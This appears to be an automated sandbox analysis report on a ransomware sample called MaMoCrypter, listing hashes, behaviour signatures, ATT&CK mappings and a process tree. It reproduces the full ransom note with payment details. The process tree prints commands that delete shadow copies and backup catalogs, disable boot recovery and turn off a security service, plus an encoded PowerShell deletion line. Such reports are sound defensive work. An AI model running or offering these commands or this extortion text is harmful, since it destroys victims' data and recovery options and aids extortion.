Analysis

  • max time kernel
    131s
  • max time network
    78s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    21-07-2020 16:16

General

  • Target

    MaMoCrypter.bin.exe

  • Size

    922KB

  • MD5

    0889138a3894284e97b61f9a310e3e7d

  • SHA1

    6c51969b1b1686abd8220191e12e647ab7312517

  • SHA256

    5063ae08ea15ab78bd9062ca0d0813c0682a22583ecd1830efeb6afcc2dd45d8

  • SHA512

    23317713644609a71953fc632478ee638d818bbb675e4f4ca00226cb4006a631800b3fe35c57aa85078f54155cb5d5c409e37fff25fc8315ee702a30c18f6f18

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\How Do I Recover My Files (Readme).txt

Ransom Note
* What happened to my files? Your important files are encrypted. Many of your documents, photos, videos, databases, and other files are no longer accessible because they are encrypted. Maybe you're busy finding a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. However, if you want to use the programs of data recovery companies, please do not work on your original files, but make copies of them. Corruption of the actual files can cause irreversible damage to your data. * Can I Recover My Files? Sure. We guarantee that you can recover all your files safely and easily. But for this you need to send $300 worth bitcoins to our address. Even if you give money, Do not believe the people around you who say they will not give your files, I Have Enough Reference To Give You Confidence. I don't know about you, so there is no point in having bad feelings towards you, doing evil to you, my goal is just to earn an income from this business. * What about the guarantees? This is just a job. We never care about you and your deals. If we do not fulfill our work and obligations - no one will cooperate with us. If you do not believe us, tell us any 1 or 2 files with SIMPLE extensions (jpg, xls, doc, etc ... not databases!) And low size (max 1 mb) 1 or 2 file and following special public and private mzrevenge keys produced for you send us we will decrypt these files and send it back to you. This is our guarantee. * How to contact with you? You can write us to our mailbox: mzrdecryptorbuy@firemail.cc Don't forget, check your "Spam" or "Junk" folder it you can't get more than 6 hours of answer. * How will the decryption process proceed after payment? After payment, we will send you our special decoder program by mail, just open it, then it will automatically decrypt all your files. but you need to pay for it and contact us. * So what is Bitcoin and how to get it? The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. https://localbitcoins.com/buy_bitcoins Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/ If you are ready to pay the money we want, Bitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd These are public and private MZREVENGE decryption keys produced for you. If these keys are damaged, nobody can recovery your files. ============================{ PUBLIC MZREVENGE KEY }============================= MZRKEYPUBLICw5nDhcKlQVfDsR7CmsOZw6fCmsKbC3nDi2TCscKPw57ChnDCni3DnsKaNsOLI1HCqWtOwpMsc1saBcOANkLCm8KhLTAyQGrDksKxw6DCncO8L0ttwphrwozCsR4qw4PDqcKww67CiMORMzrDo2nCqxMiLRfDrVfCgjRcelAVJcO0eCbCssOBw7DDo8O3w54rw4vCv8Kkw5LCqcOHesK4w6XDlcOBMsKXwoReaMO4wpd5wpQzwpzCj8KiwozCgcOgRQFSLcKkQQXDtcKYwrXDg8KXf8K+cTrCgMOwwoHCsMK7JsKeJxVrwrHDsyRnesKdIE8zNAwkKznDpBdpwodvaTTCjGHCksOewppld0oVI2ZAwoPCqsOGK8KLBnVmdk/DsMKwKxDCnDbDuxzDt8OPE8O3EnnCoUXCk8OcOSvDhcO/FcKeAcKmJMKBXV7DjcKsw4NVw5gXwrEVdmvCoHXDhiZlesOLUnIrehLDnsKow6EXbMOUwrvDlVLDmsOdKsKAw53CnHfClDbCuCNmwokVwrl6w7bCl03CgMO2w69hwrVvwrfDpDEFw6M6wr/CsMK3w4NEwovCgMKOwqbCmylwwpNDw6pFAcOcw7HClEjDsxPDtlAxY8OBwprCnsKSwprCq8Kxwrxv ================================================================================= ============================{ PRIVATE MZREVENGE KEY }============================ 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 =================================================================================
Emails

mzrdecryptorbuy@firemail.cc

Wallets

3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd

Signatures

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Modifies registry class 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Program crash 1 IoCs
  • UAC bypass 3 TTPs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Drops file in Drivers directory 1 IoCs
  • System policy modification 1 TTPs 17 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

Processes

  • C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\MaMoCrypter.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Modifies registry class
      • Executes dropped EXE
      • Drops file in Drivers directory
      • System policy modification
      • Suspicious use of WriteProcessMemory
      • Checks whether UAC is enabled
      PID:1464
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\SysWOW64\sc.exe
          sc config "AppCheck" start=disabled
          4⤵
            PID:2720
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1888
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:2560
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3024
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
          3⤵
            PID:2100
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 704
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Program crash
              PID:3396
          • C:\Windows\SysWOW64\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\How Do I Recover My Files (Readme).txt
            3⤵
              PID:732
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          • Modifies service
          PID:3680

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Privilege Escalation

        Bypass User Account Control

        1
        T1088

        Defense Evasion

        Modify Registry

        3
        T1112

        Bypass User Account Control

        1
        T1088

        Disabling Security Tools

        1
        T1089

        File Deletion

        2
        T1107

        Discovery

        System Information Discovery

        1
        T1082

        Impact

        Inhibit System Recovery

        2
        T1490

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\How Do I Recover My Files (Readme).txt
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        • memory/732-9-0x0000000000000000-mapping.dmp
        • memory/1464-0-0x0000000000000000-mapping.dmp
        • memory/1836-2-0x0000000000000000-mapping.dmp
        • memory/1888-3-0x0000000000000000-mapping.dmp
        • memory/2100-12-0x0000000000000000-mapping.dmp
        • memory/2100-11-0x0000000000000000-mapping.dmp
        • memory/2100-4-0x0000000000000000-mapping.dmp
        • memory/2100-13-0x0000000000000000-mapping.dmp
        • memory/2100-14-0x0000000000000000-mapping.dmp
        • memory/2100-15-0x0000000000000000-mapping.dmp
        • memory/2100-16-0x0000000000000000-mapping.dmp
        • memory/2560-5-0x0000000000000000-mapping.dmp
        • memory/2720-6-0x0000000000000000-mapping.dmp
        • memory/3024-7-0x0000000000000000-mapping.dmp
        • memory/3396-8-0x00000000049C0000-0x00000000049C1000-memory.dmp
          Filesize

          4KB

        • memory/3396-17-0x00000000050F0000-0x00000000050F1000-memory.dmp
          Filesize

          4KB